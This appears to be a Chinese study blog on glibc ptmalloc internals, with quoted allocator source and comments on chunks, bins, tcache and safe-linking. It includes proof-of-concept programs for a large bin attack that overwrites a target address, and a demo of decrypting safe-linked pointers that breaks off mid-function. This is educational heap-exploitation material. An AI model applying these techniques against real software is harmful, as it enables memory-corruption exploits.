INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */ INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */
structmalloc_chunk* fd;/* double links -- used only if free. */ structmalloc_chunk* bk;
/* Only used for large blocks: pointer to next larger size. */ structmalloc_chunk* fd_nextsize;/* double links -- used only if free. */ structmalloc_chunk* bk_nextsize; };
/* The corresponding word size */ #define SIZE_SZ (sizeof(INTERNAL_SIZE_T))
/* MALLOC_ALIGNMENT is the minimum alignment for malloc'ed chunks. It must be a power of two at least 2 * SIZE_SZ, even on machines for which smaller alignments would suffice. It may be defined as larger than this though. Note however that code and data structures are optimized for the case of 8-byte alignment. */
#ifndef MALLOC_ALIGNMENT # if !SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_16) /* This is the correct definition when there is no past ABI to constrain it.
Among configurations with a past ABI constraint, it differs from 2*SIZE_SZ only on powerpc32. For the time being, changing this is causing more compatibility problems due to malloc_get_state and malloc_set_state than will returning blocks not adequately aligned for long double objects under -mlong-double-128. */
/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained from a non-main arena. This is only set immediately before handing the chunk to the user, if necessary. */ #define NON_MAIN_ARENA 0x4
/* check for chunk from non-main arena */ #define chunk_non_main_arena(p) ((p)->size & NON_MAIN_ARENA)
structmalloc_state { /* Serialize access. */ __libc_lock_define (, mutex); /* Flags (formerly in max_fast). */ int flags; /* Set if the fastbin chunks contain recently inserted free blocks. */ /* Note this is a bool but not all targets support atomics on booleans. */ int have_fastchunks; /* Fastbins */ mfastbinptr fastbinsY[NFASTBINS]; /* Base of the topmost chunk -- not otherwise kept in a bin */ mchunkptr top; /* The remainder from the most recent split of a small request */ mchunkptr last_remainder; /* Normal bins packed as described above */ mchunkptr bins[NBINS * 2 - 2]; /* Bitmap of bins */ unsignedint binmap[BINMAPSIZE]; /* Linked list */ structmalloc_state *next; /* Linked list for free arenas. Access to this field is serialized by free_list_lock in arena.c. */ structmalloc_state *next_free; /* Number of threads attached to this arena. 0 if the arena is on the free list. Access to this field is serialized by free_list_lock in arena.c. */ INTERNAL_SIZE_T attached_threads; /* Memory allocated from the system in this arena. */ INTERNAL_SIZE_T system_mem; INTERNAL_SIZE_T max_system_mem; };
An array of bin headers for free chunks. Each bin is doubly linked. The bins are approximately proportionally (log) spaced. There are a lot of these bins (128). This may look excessive, but works very well in practice. Most bins hold sizes that are unusual as malloc request sizes, but are more usual for fragments and consolidated sets of chunks, which is what these bins hold, so they can be found quickly. All procedures maintain the invariant that no consolidated chunk physically borders another one, so each chunk in a list is known to be preceeded and followed by either inuse chunks or the ends of memory.
Chunks in bins are kept in size order, with ties going to the approximately least recently used chunk. Ordering isn't needed for the small bins, which all contain the same-sized chunks, but facilitates best-fit allocation for larger chunks. These lists are just sequential. Keeping them in order almost never requires enough traversal to warrant using fancier ordered data structures.
Chunks of the same size are linked with the most recently freed at the front, and allocations are taken from the back. This results in LRU (FIFO) allocation order, which tends to give each chunk an equal opportunity to be consolidated with adjacent freed chunks, resulting in larger free chunks and less fragmentation.
To simplify use in double-linked lists, each bin header acts as a malloc_chunk. This avoids special-casing for headers. But to conserve space and improve locality, we allocate only the fd/bk pointers of bins, and then use repositioning tricks to treat these as the fields of a malloc_chunk*. */
在ptmalloc中bins数组中的bin一共可以划分为三类 : unsorted binsmall binlarge bin
ps:好乱,果然知识能授予,智慧只能自己领悟qwq
unsorted bin
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
/* Unsorted chunks
All remainders from chunk splits, as well as all returned chunks, are first placed in the "unsorted" bin. They are then placed in regular bins after malloc gives them ONE chance to be used before binning. So, basically, the unsorted_chunks list acts as a queue, with chunks being placed on it in free (and malloc_consolidate), and taken off (to be either used or placed in bins) in malloc.
The NON_MAIN_ARENA flag is never set for unsorted chunks, so it does not have to be taken into account in size comparisons. */
/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */ #define unsorted_chunks(M) (bin_at (M, 1))
#include<stdio.h> #include<stdlib.h> #include<assert.h> intmain(){ /*Disable IO buffering to prevent stream from interfering with heap*/ setvbuf(stdin,NULL,_IONBF,0); setvbuf(stdout,NULL,_IONBF,0); setvbuf(stderr,NULL,_IONBF,0);
printf("\n\n"); printf("Since glibc2.30, two new checks have been enforced on large bin chunk insertion\n\n"); printf("Check 1 : \n"); printf("> if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))\n"); printf("> malloc_printerr (\"malloc(): largebin double linked list corrupted (nextsize)\");\n"); printf("Check 2 : \n"); printf("> if (bck->fd != fwd)\n"); printf("> malloc_printerr (\"malloc(): largebin double linked list corrupted (bk)\");\n\n"); printf("This prevents the traditional large bin attack\n"); printf("However, there is still one possible path to trigger large bin attack. The PoC is shown below : \n\n");
size_t target = 0; printf("Here is the target we want to overwrite (%p) : %lu\n\n",&target,target); size_t *p1 = malloc(0x428); printf("First, we allocate a large chunk [p1] (%p)\n",p1-2); size_t *g1 = malloc(0x18); printf("And another chunk to prevent consolidate\n");
printf("\n");
size_t *p2 = malloc(0x418); printf("We also allocate a second large chunk [p2] (%p).\n",p2-2); printf("This chunk should be smaller than [p1] and belong to the same large bin.\n"); size_t *g2 = malloc(0x18); printf("Once again, allocate a guard chunk to prevent consolidate\n");
printf("\n");
free(p1); printf("Free the larger of the two --> [p1] (%p)\n",p1-2); size_t *g3 = malloc(0x438); printf("Allocate a chunk larger than [p1] to insert [p1] into large bin\n");
printf("\n");
free(p2); printf("Free the smaller of the two --> [p2] (%p)\n",p2-2); printf("At this point, we have one chunk in large bin [p1] (%p),\n",p1-2); printf(" and one chunk in unsorted bin [p2] (%p)\n",p2-2);
printf("\n");
p1[3] = (size_t)((&target)-4); printf("Now modify the p1->bk_nextsize to [target-0x20] (%p)\n",(&target)-4);
printf("\n");
size_t *g4 = malloc(0x438); printf("Finally, allocate another chunk larger than [p2] (%p) to place [p2] (%p) into large bin\n", p2-2, p2-2); printf("Since glibc does not check chunk->bk_nextsize if the new inserted chunk is smaller than smallest,\n"); printf(" the modified p1->bk_nextsize does not trigger any error\n"); printf("Upon inserting [p2] (%p) into largebin, [p1](%p)->bk_nextsize->fd_nextsize is overwritten to address of [p2] (%p)\n", p2-2, p1-2, p2-2);
printf("\n");
printf("In our case here, target is now overwritten to address of [p2] (%p), [target] (%p)\n", p2-2, (void *)target); printf("Target (%p) : %p\n",&target,(size_t*)target);
An array of lists holding recently freed small chunks. Fastbins are not doubly linked. It is faster to single-link them, and since chunks are never removed from the middles of these lists, double linking is not necessary. Also, unlike regular bins, they are not even processed in FIFO order (they use faster LIFO) since ordering doesn't much matter in the transient contexts in which fastbins are normally used.
Chunks in fastbins keep their inuse bit set, so they cannot be consolidated with other free chunks. malloc_consolidate releases all chunks in fastbins and consolidates them with other free chunks. */
#if USE_TCACHE /* We want 64 entries. This is an arbitrary limit, which tunables can reduce. */ # define TCACHE_MAX_BINS 64 # define MAX_TCACHE_SIZE tidx2usize (TCACHE_MAX_BINS-1) /* Only used to pre-fill the tunables. */ # define tidx2usize(idx) (((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ) /* When "x" is from chunksize(). */ # define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT) /* When "x" is a user-provided size. */ # define usize2tidx(x) csize2tidx (request2size (x)) /* With rounding and alignment, the bins are... idx 0 bytes 0..24 (64-bit) or 0..12 (32-bit) idx 1 bytes 25..40 or 13..20 idx 2 bytes 41..56 or 21..28 etc. */ /* This is another arbitrary limit, which tunables can change. Each tcache bin will hold at most this number of chunks. */ # define TCACHE_FILL_COUNT 7 /* Maximum chunks in tcache bins for tunables. This value must fit the range of tcache->counts[] entries, else they may overflow. */ # define MAX_TCACHE_COUNT UINT16_MAX #endif
TCACHE_MAX_BINS = 64 定义了最多有 64 个大小类别(bin)
TCACHE_FILL_COUNT = 7 每个 bin 最多缓存 7 个 chunk(default)
MAX_TCACHE_COUNT 单个 bin 的最大计数上限(防止溢出)
MAX_TCACHE_SIZE tcache 能管理的最大 chunk 大小
并定义了chunk size <-> tcache bin 下标的转换,每个 bin 管一段连续大小区间,按MALLOC_ALIGNMENT(16 字节)对齐递增
size_t mchunk_prev_size; /* Size of previous chunk (if free). */ size_t mchunk_size; /* Size in bytes, including overhead. */
structmalloc_chunk* fd;/* double links -- used only if free. */ structmalloc_chunk* bk;
/* Only used for large blocks: pointer to next larger size. */ structmalloc_chunk* fd_nextsize;/* double links -- used only if free. */ structmalloc_chunk* bk_nextsize; };
/* The corresponding word size. */ #define SIZE_SZ (sizeof (size_t))
/* The corresponding bit mask value. */ #define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1)
/* The smallest possible chunk */ #define MIN_CHUNK_SIZE (offsetof(struct malloc_chunk, fd_nextsize))
/* The smallest size we can malloc is an aligned minimal chunk */ #define MINSIZE \ (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
/* When "x" is from chunksize(). */ # define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
/* When "x" is a user-provided size. */ # define usize2tidx(x) csize2tidx (request2size (x))
intmain() { unsignedlonglong req; unsignedlonglong tidx; fprintf(stderr, "This file doesn't demonstrate an attack, but calculates the tcache idx for a given chunk size.\n"); fprintf(stderr, "The basic formula is as follows:\n"); fprintf(stderr, "\tIDX = (CHUNKSIZE - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT\n"); fprintf(stderr, "\tOn a 64 bit system the current values are:\n"); fprintf(stderr, "\t\tMINSIZE: 0x%lx\n", MINSIZE); fprintf(stderr, "\t\tMALLOC_ALIGNMENT: 0x%lx\n", MALLOC_ALIGNMENT); fprintf(stderr, "\tSo we get the following equation:\n"); fprintf(stderr, "\tIDX = (CHUNKSIZE - 0x%lx) / 0x%lx\n\n", MINSIZE-MALLOC_ALIGNMENT+1, MALLOC_ALIGNMENT); fprintf(stderr, "BUT be AWARE that CHUNKSIZE is not the x in malloc(x)\n"); fprintf(stderr, "It is calculated as follows:\n"); fprintf(stderr, "\tIF x + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE(0x%lx) CHUNKSIZE = MINSIZE (0x%lx)\n", MINSIZE, MINSIZE); fprintf(stderr, "\tELSE: CHUNKSIZE = (x + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK) \n"); fprintf(stderr, "\t=> CHUNKSIZE = (x + 0x%lx + 0x%lx) & ~0x%lx\n\n\n", SIZE_SZ, MALLOC_ALIGN_MASK, MALLOC_ALIGN_MASK); while(1) { fprintf(stderr, "[CTRL-C to exit] Please enter a size x (malloc(x)) in hex (e.g. 0x10): "); scanf("%llx", &req); tidx = usize2tidx(req); if (tidx > 63) { fprintf(stderr, "\nWARNING: NOT IN TCACHE RANGE!\n"); } fprintf(stderr, "\nTCache Idx: %llu\n", tidx); } return0; }
/* Safe-Linking: Use randomness from ASLR (mmap_base) to protect single-linked lists of Fast-Bins and TCache. That is, mask the "next" pointers of the lists' chunks, and also perform allocation alignment checks on them. This mechanism reduces the risk of pointer hijacking, as was done with Safe-Unlinking in the double-linked lists of Small-Bins. It assumes a minimum page size of 4096 bytes (12 bits). Systems with larger pages provide less entropy, although the pointer mangling still works. */ #define PROTECT_PTR(pos, ptr) \ ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr))) #define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)
longdecrypt(long cipher) { puts("The decryption uses the fact that the first 12bit of the plaintext (the fwd pointer) is known,"); puts("because of the 12bit sliding."); puts("And the key, the ASLR value, is the same with the leading bits of the plaintext (the fwd pointer)"); long key = 0; long plain;
intmain() { /* * This technique demonstrates how to recover the original content from a poisoned * value because of the safe-linking mechanism. * The attack uses the fact that the first 12 bit of the plaintext (pointer) is known * and the key (ASLR slide) is the same to the pointer's leading bits. * As a result, as long as the chunk where the pointer is stored is at the same page * of the pointer itself, the value of the pointer can be fully recovered. * Otherwise, we can also recover the pointer with the page-offset between the storer * and the pointer. What we demonstrate here is a special case whose page-offset is 0. * For demonstrations of other more general cases, plz refer to * https://github.com/n132/Dec-Safe-Linking */
setbuf(stdin, NULL); setbuf(stdout, NULL);
// step 1: allocate chunks long *a = malloc(0x20); long *b = malloc(0x20); printf("First, we create chunk a @ %p and chunk b @ %p\n", a, b); malloc(0x10); puts("And then create a padding chunk to prevent consolidation.");
// step 2: free chunks puts("Now free chunk a and then free chunk b."); free(a); free(b); printf("Now the freelist is: [%p -> %p]\n", b, a); printf("Due to safe-linking, the value actually stored at b[0] is: %#lx\n", b[0]);
// step 3: recover the values puts("Now decrypt the poisoned value"); long plaintext = decrypt(b[0]);